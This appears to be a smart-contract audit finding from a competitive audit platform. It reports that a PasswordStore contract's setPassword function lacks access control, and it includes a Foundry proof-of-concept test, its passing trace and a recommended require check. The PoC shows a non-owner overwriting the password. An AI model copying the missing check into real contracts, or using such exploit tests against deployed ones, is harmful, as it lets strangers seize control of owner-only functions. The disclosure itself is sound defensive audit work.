Lack of access Control can let anyone set Password
Summary
Amnyone can set owner as opposed to what the PasswordStore contract intends on achieving.
Vulnerability Details
The intention behind the Passsword contract is to make sure only a valid owner sets password and gets to see the password but due to a lack of access control or even just a require statement, this cannot be achieved.
POC:
Add the following test to the test/PasswordStore.t.sol and run
function test_not_owner_can_set_password() public {
vm.startPrank(address(1));
string memory expectedPassword = "attackerpassword";
passwordStore.setPassword(expectedPassword);
vm.startPrank(owner);
string memory actualPassword = passwordStore.getPassword();
assertEq(actualPassword, expectedPassword);
}
Test Output: [PASS] test_not_owner_can_set_password() (gas: 22538)
Traces:
[22538] PasswordStoreTest::test_not_owner_can_set_password()
├─ [0] VM::startPrank(0x0000000000000000000000000000000000000001)
│ └─ ← ()
├─ [6686] PasswordStore::setPassword(attackerpassword)
│ ├─ emit SetNetPassword()
│ └─ ← ()
├─ [0] VM::startPrank(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38])
│ └─ ← ()
├─ [3320] PasswordStore::getPassword() [staticcall]
│ └─ ← attackerpassword
└─ ← ()
Impact
Anyone can set the password
Tools Used
Manual review
Recommendations
Add an "if"or a require statement in the setPassword function to make sure that only the owner can call it. This would help validate the owner.
Lead Judging Commences
finding-lacking-access-control
Anyone can call `setPassword` and set a new password contrary to the intended purpose.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.